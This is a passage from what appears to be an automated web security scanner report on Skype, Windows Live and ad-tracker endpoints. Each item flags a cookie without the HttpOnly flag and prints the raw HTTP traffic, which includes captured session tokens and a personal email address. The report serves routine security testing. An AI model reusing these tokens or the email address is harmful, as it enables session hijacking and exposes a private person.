Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; skype-session=l5p5g0er47bh75g44j3p4n46h7

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:19:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-2012 21:19:35 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 33957
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

11.60. https://login.skype.com/account/login-form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/login-form

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/login-form?product-type=package-global-region-landline-eu-unlimited&application=subscription&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; skype-session=l5p5g0er47bh75g44j3p4n46h7

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:19:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-2012 21:19:11 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 47339
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...

11.61. https://login.skype.com/account/password-automation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/password-automation

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/password-automation HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://login.skype.com/account/password-reset-request?setlang=en&intsrc=client%7Cforgot-name
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 18:00:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 18:00:16 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 43776
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="lt
...[SNIP]...

11.62. https://login.skype.com/account/password-token-sent  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/password-token-sent

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/password-token-sent?mode=&email=h02332%40gmail.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://login.skype.com/account/password-reset-request?setlang=en&intsrc=client%7Cforgot-pword
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 20:59:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 20:59:41 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 41059
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...

11.63. https://login.skype.com/account/signup-form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/signup-form

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/signup-form?setlang=en&intsrc=client%7Creg-a%7C0%2F5.5.0.114 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3
Host: login.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:59:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 17:59:54 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 119699
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...

11.64. https://login.skype.com/go/shop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/shop HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:25 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

11.65. https://login.skype.com/go/shop.accessories.headsets  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop.accessories.headsets

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/shop.accessories.headsets HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:27 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

11.66. https://login.skype.com/go/shop.accessories.phones  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop.accessories.phones

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/shop.accessories.phones HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:06 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

11.67. https://login.skype.com/go/shop.accessories.webcams  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop.accessories.webcams

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/shop.accessories.webcams HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:18 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

11.68. https://login.skype.com/go/shop.extras  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/shop.extras

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/shop.extras HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:20 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

11.69. https://login.skype.com/go/skype.manager.setup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/skype.manager.setup

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/skype.manager.setup HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:24 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

11.70. https://login.skype.com/go/tvwebcams  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /go/tvwebcams

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/tvwebcams HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:48:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:ENV=cookieCheck:LC=en-us:LIM=:TM=1314116679:TS=1314116679:TZ=:UCP=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:48:18 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 33957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

11.71. http://m.webtrends.com/dcsmgru7m99k7mqmgrhudo0k8_8c6m/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /dcsmgru7m99k7mqmgrhudo0k8_8c6m/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsmgru7m99k7mqmgrhudo0k8_8c6m/dcs.gif?&dcsdat=1315189428202&dcssip=msdn.microsoft.com&dcsuri=/en-us/library/ms533897(d=lightweight,l=en-us,v=VS.85).aspx&dcsref=http://www.google.com/search%3Fsourceid=chrome%26ie=UTF-8%26q=Referrer%2Bdata%2Bfound%2Bin%2Bdisplayed%2BinnerHTML%23sclient=psy%26hl=en%26source=hp%26q=Referrer%2Bdata%2Bdisplayed%2BinnerHTML%26pbx=1%26oq=Referrer%2Bdata%2Bdisplayed%2BinnerHTML%26aq=f%26aqi=%26aql=%26gs_sm=e%26gs_upl=9979l11361l0l11816l9l8l0l0l0l1l906l906l6-1l1l0%26bav=on.2,or.r_gc.r_pw.%26fp=b7e6040383bebbf%26biw=1266%26bih=910&WT.tz=-5&WT.bh=21&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=innerHTML%20Property%20(A,%20ABBR,%20ACRONYM,%20...)&WT.js=Yes&WT.jv=1.5&WT.bs=1266x910&WT.fi=Yes&WT.fv=10.3&WT.sp=msdnlib_webdev&WT.dl=0&WT.dcsvid=GUID=f4593467ede44f6aaa7ee86821872394%26HASH=f459%26LV=20118%26V=3&WT.dcsdat=1315189428202&WT.wtsv=1&WT.sv_sp=msdnlib_webdev&WT.co_f=50.23.123.106-382843424.30173056&WT.vt_f_tlh=1315017980&WT.vt_f_tlv=1315015067&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_sid=50.23.123.106-382843424.30173056.1315189428206&wt_date=2011/9/4&wt_dos=1&wtDrillDir=/en-us/;/en-us/library/&wtEvtSrc=msdn.microsoft.com/en-us/library/ms533897(v=vs.85).aspx HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/library/ms533897(v=vs.85).aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; is_human=true; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMzgyODQzNDI0LjMwMTczMDU2AAAAAAAAAAAJAAAACgAAALWLYU61i2FOdQAAAHaPYU54iWFO8gEAAJeLYU6LiWFOFQAAAM7CYE6OwmBOKwIAAKYvYU6YL2FOGwEAAKGUYU5wi2FODQAAAA2UYU54i2FO/QEAAJqSYU6ZkmFOmwEAACSUYU7uk2FOBQAAABMAAACakmFOi4lhTkQAAAB2j2FOeIlhTiAAAADOwmBOjsJgThUAAAChlGFOcIthTpgAAAAklGFO7pNhTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 05 Sep 2011 02:23:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMzgyODQzNDI0LjMwMTczMDU2AAAAAAAAAAAJAAAACgAAALWLYU61i2FOdQAAAHaPYU54iWFO8gEAAJeLYU6LiWFOFQAAAM7CYE6OwmBOKwIAAKYvYU6YL2FOGwEAAKGUYU5wi2FODQAAAI8yZE6PMmRO/QEAAJqSYU6ZkmFOmwEAACSUYU7uk2FOBQAAABMAAACakmFOi4lhTkQAAAB2j2FOeIlhTiAAAADOwmBOjsJgThUAAACPMmROjzJkTpgAAAAklGFO7pNhTgAAAAA-; path=/; expires=Thu, 02-Sep-2021 02:23:11 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

11.72. http://media.fastclick.net/w/tre  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/tre?ad_id=22273;evt=17163;cat1=21276;cat2=21277;rand=1234 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://fls.doubleclick.net/activityi;src=2609787;type=skype282;cat=paids084;ord=1;num=1?
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: media.fastclick.net
Proxy-Connection: Keep-Alive
Cookie: pluto2=886256604868; pluto=886256604868

Response

HTTP/1.1 302 Redirect
Date: Sun, 04 Sep 2011 21:13:42 GMT
Location: http://www.googleadservices.com/pagead/conversion/1032669722/?label=oTyeCPDnrQEQmpS17AM&amp;guid=ON&amp;script=0
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVo TAIo PSAo HISo OTPo OUR DELo BUS COM NAV INT DSP COR"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: pluto=886256604868; domain=.fastclick.net; path=/; expires=Tue, 03-Sep-2013 21:13:42 GMT


11.73. http://metrics.skype.com/b/ss/skypeallprod/1/H.17/s33706402148852  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.skype.com
Path:   /b/ss/skypeallprod/1/H.17/s33706402148852

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/skypeallprod/1/H.17/s33706402148852?AQB=1&ndh=1&t=4/8/2011%2012%3A59%3A48%200%20300&vmt=4AAF54FD&ce=UTF-8&ns=skype&pageName=clientlogin/account&g=file%3A///C%3A/ProgramData/Skype/Apps/login/index.html&cc=EUR&ch=clientlogin&events=event47&c5=en&v5=en&v6=0/5.5.0.114&c24=0/5.5.0.114&v36=client%7Creg-a%7C0/5.5.0.114&s=1920x1200&c=16&j=1.5&v=Y&k=Y&bw=720&bh=472&pe=lnk_o&pev2=ClientOnCreateAccount&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: metrics.skype.com

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 17:59:10 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|2731DE37051D260E-4000010C00147A96[CE]; Expires=Fri, 2 Sep 2016 17:59:10 GMT; Domain=.skype.com; Path=/
Location: http://metrics.skype.com/b/ss/skypeallprod/1/H.17/s33706402148852?AQB=1&pccr=true&vidn=2731DE37051D260E-4000010C00147A96&&ndh=1&t=4/8/2011%2012%3A59%3A48%200%20300&vmt=4AAF54FD&ce=UTF-8&ns=skype&pageName=clientlogin/account&g=file%3A///C%3A/ProgramData/Skype/Apps/login/index.html&cc=EUR&ch=clientlogin&events=event47&c5=en&v5=en&v6=0/5.5.0.114&c24=0/5.5.0.114&v36=client%7Creg-a%7C0/5.5.0.114&s=1920x1200&c=16&j=1.5&v=Y&k=Y&bw=720&bh=472&pe=lnk_o&pev2=ClientOnCreateAccount&AQE=1
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 17:59:10 GMT
Last-Modified: Mon, 05 Sep 2011 17:59:10 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www96
Content-Length: 0
Content-Type: text/plain


11.74. https://mid.live.com/si/login.aspx/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mid.live.com
Path:   /si/login.aspx/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /si/login.aspx/x22 HTTP/1.1
Host: mid.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2491
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: lc=en-US; path=/
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 04 Sep 2011 21:48:27 GMT
Connection: close

<html>
<head>
<title>Windows Live ID</title>
<meta name="MobileOptimized" content="100"/>
<link type="text/css" rel="stylesheet" href="/hig.css"/>
</head>
<body>
<form id="EmailPasswordForm" na
...[SNIP]...

11.75. https://mid.live.com/si/login.aspx/x3c/cite/x3e/x3cspan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mid.live.com
Path:   /si/login.aspx/x3c/cite/x3e/x3cspan

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /si/login.aspx/x3c/cite/x3e/x3cspan HTTP/1.1
Host: mid.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2560
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: lc=en-US; path=/
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 04 Sep 2011 21:48:29 GMT
Connection: close

<html>
<head>
<title>Windows Live ID</title>
<meta name="MobileOptimized" content="100"/>
<link type="text/css" rel="stylesheet" href="/hig.css"/>
</head>
<body>
<form id="EmailPasswordForm" na
...[SNIP]...

11.76. http://msdn.microsoft.com/en-us/library/ms533897(v=vs.85).aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms533897(v=vs.85).aspx

Issue detail

